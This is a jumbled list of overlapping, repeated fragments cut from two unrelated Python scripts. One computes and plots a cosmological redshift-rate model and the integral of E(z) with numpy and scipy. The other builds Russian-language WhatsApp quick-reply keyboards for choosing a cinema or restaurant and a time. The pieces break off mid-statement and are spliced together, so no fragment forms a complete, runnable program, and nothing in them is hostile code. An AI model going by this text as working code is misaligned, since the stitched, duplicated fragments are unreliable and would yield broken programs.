np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1]", "Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh =", "z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)):", "for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 /", "= Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes", "def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1", "np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0", "* (z > z1) R *= n0 / R[0] return z, R z,", "Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz", "Eall = Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics =", "/ R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$')", "rbrk * Rhigh * (z > z1) R *= n0 / R[0] return", "* dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics / E;", "n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1", "int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda =", "= Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0,", "= np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics =", "= np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1 - n2)", "range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz)", "= 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3)", "n1 - n2) R = Rlow * (z <= z1) + rbrk *", "#### This computes E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z):", "z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] =", "numpy as np from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0,", "z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log')", "scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)):", "n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 +", "computes E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m =", "n0 / R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k')", "plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves", "z1) R *= n0 / R[0] return z, R z, R = Redshift(0.84,", "R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) * Eall", "np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R /", "Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z)", "Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 +", "Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp", "+ rbrk * Rhigh * (z > z1) R *= n0 / R[0]", "* np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0", "Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R =", "-0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g')", "E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R", "and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda", "import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow", "E = Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv,", "Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0", "E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics /", "3) + Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z =", "E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1)", "E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E def", "n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0", "#Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0", "np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z): return", "to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m", "-0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z", "= z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i in", "= np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall", "+ Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001)", "quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow =", "np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z)", "np.power((1.0 + z1), n1 - n2) R = Rlow * (z <= z1)", "rbrk = np.power((1.0 + z1), n1 - n2) R = Rlow * (z", "= np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape)", "Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda)", "2.07, -0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r')", "np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1 - n2) R", "return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E", "plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and", "Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:]", "np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0", "= R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g') plt.xlabel(r'$z$') plt.grid() plt.show()", "return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid()", "/ Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z)", "E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf')", "Rhigh * (z > z1) R *= n0 / R[0] return z, R", "z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g') plt.xlabel(r'$z$')", "np from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2,", "i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E)", "E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274", "in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) *", "Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall", "= 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return", "#Eics[0] = 0 Eall = Eics / E; z = z.reshape(z.shape[0],1) E =", "= Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1)", "z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z", "= (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] =", "as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z),", "= z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d =", "This computes E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m", "z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) *", "as np from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1,", "= Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z = z.reshape(z.shape[0],1)", "z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics =", "0 Eall = Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics", "0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E", "R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This", "plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z')", "R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$')", "+ z), n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 +", "z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1)", "file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m *", "plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves to", "dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726", "1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E =", "def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh", "Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z = z.reshape(z.shape[0],1) E", "2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and", "import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0", "Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07,", "* Rhigh * (z > z1) R *= n0 / R[0] return z,", "return E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz =", "n2) R = Rlow * (z <= z1) + rbrk * Rhigh *", "np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for", "= E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2,", "+ z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z)", "Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7," ]
[ "stones[0..i] are merged whose value is prefix[i] dp = [-math.inf] * n #", "whose value is prefix[i] dp = [-math.inf] * n # must take all", "value is prefix[i] dp = [-math.inf] * n # must take all when", "# must take all when there're only two stones left dp[n - 2]", "Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones))", "stones left dp[n - 2] = prefix[-1] for i in reversed(range(n - 2)):", "game starts # at i, i.e., stones[0..i] are merged whose value is prefix[i]", "= [-math.inf] * n # must take all when there're only two stones", "= list(accumulate(stones)) # dp[i] := max score diff the current player can get", "- 2] = prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i", "- 2)): dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i +", "dp[i] := max score diff the current player can get when the game", "when the game starts # at i, i.e., stones[0..i] are merged whose value", "VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix", "when there're only two stones left dp[n - 2] = prefix[-1] for i", "max score diff the current player can get when the game starts #", "prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i", "score diff the current player can get when the game starts # at", "def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) #", "i.e., stones[0..i] are merged whose value is prefix[i] dp = [-math.inf] * n", "* n # must take all when there're only two stones left dp[n", "dp[n - 2] = prefix[-1] for i in reversed(range(n - 2)): dp[i] =", "2] = prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i +", "player can get when the game starts # at i, i.e., stones[0..i] are", "are merged whose value is prefix[i] dp = [-math.inf] * n # must", "reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i", "starts # at i, i.e., stones[0..i] are merged whose value is prefix[i] dp", "n # must take all when there're only two stones left dp[n -", "for i in reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i +", "2)): dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i + 1])", "len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff the current player", "can get when the game starts # at i, i.e., stones[0..i] are merged", "[-math.inf] * n # must take all when there're only two stones left", "there're only two stones left dp[n - 2] = prefix[-1] for i in", "n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff the", "the current player can get when the game starts # at i, i.e.,", "Game VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones)", "List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max", "-> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max score", "prefix = list(accumulate(stones)) # dp[i] := max score diff the current player can", "diff the current player can get when the game starts # at i,", "current player can get when the game starts # at i, i.e., stones[0..i]", "i, i.e., stones[0..i] are merged whose value is prefix[i] dp = [-math.inf] *", "Stone Game VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n =", ":= max score diff the current player can get when the game starts", "prefix[i] dp = [-math.inf] * n # must take all when there're only", "only two stones left dp[n - 2] = prefix[-1] for i in reversed(range(n", "in reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i + 1] -", "stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i]", "# dp[i] := max score diff the current player can get when the", "dp = [-math.inf] * n # must take all when there're only two", "take all when there're only two stones left dp[n - 2] = prefix[-1]", "merged whose value is prefix[i] dp = [-math.inf] * n # must take", "two stones left dp[n - 2] = prefix[-1] for i in reversed(range(n -", "= max(dp[i + 1], prefix[i + 1] - dp[i + 1]) return dp[0]", "= prefix[-1] for i in reversed(range(n - 2)): dp[i] = max(dp[i + 1],", "list(accumulate(stones)) # dp[i] := max score diff the current player can get when", "get when the game starts # at i, i.e., stones[0..i] are merged whose", "# at i, i.e., stones[0..i] are merged whose value is prefix[i] dp =", "left dp[n - 2] = prefix[-1] for i in reversed(range(n - 2)): dp[i]", "class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n = len(stones) prefix =", "dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i + 1]) return", "int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff", "i in reversed(range(n - 2)): dp[i] = max(dp[i + 1], prefix[i + 1]", "= len(stones) prefix = list(accumulate(stones)) # dp[i] := max score diff the current", "must take all when there're only two stones left dp[n - 2] =", "the game starts # at i, i.e., stones[0..i] are merged whose value is", "is prefix[i] dp = [-math.inf] * n # must take all when there're", "stones: List[int]) -> int: n = len(stones) prefix = list(accumulate(stones)) # dp[i] :=", "at i, i.e., stones[0..i] are merged whose value is prefix[i] dp = [-math.inf]", "all when there're only two stones left dp[n - 2] = prefix[-1] for", "<filename>Leetcode/1000-2000/1872. Stone Game VIII/1872.py class Solution: def stoneGameVIII(self, stones: List[int]) -> int: n" ]
[]
[]
[ "kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас", "из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb", "kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\",", "kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText(", "return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\",", "content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для", "header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content)", "kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb =", "kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\"", "QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" ) kb =", ") kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно", "text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00'))", "Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def", "return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\",", "хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content)", "caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): #", "время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time():", ") kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content =", "Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def", "kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" )", "сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"),", "QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите", "generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\",", "= QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\",", "= QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\",", "import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content =", "для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb", "QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда", "def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" )", "kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В примере", "def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", )", "header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content)", "вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the", "text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return", "generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В примере не использовалось", "caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content", "= QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\",", "предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def", "клавиатуру с изображением, вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\",", "callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\",", "text=\"this is the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"),", "the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить", "заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\",", "kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить", "примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is", "В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this", "QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText(", "QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с", "content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо", "с изображением, вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this", "kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText(", "waio.keyboard.reply import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content", "def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В примере не", "kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас", "QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"),", "def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного", "url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\",", "вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\",", "QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb", "body\", 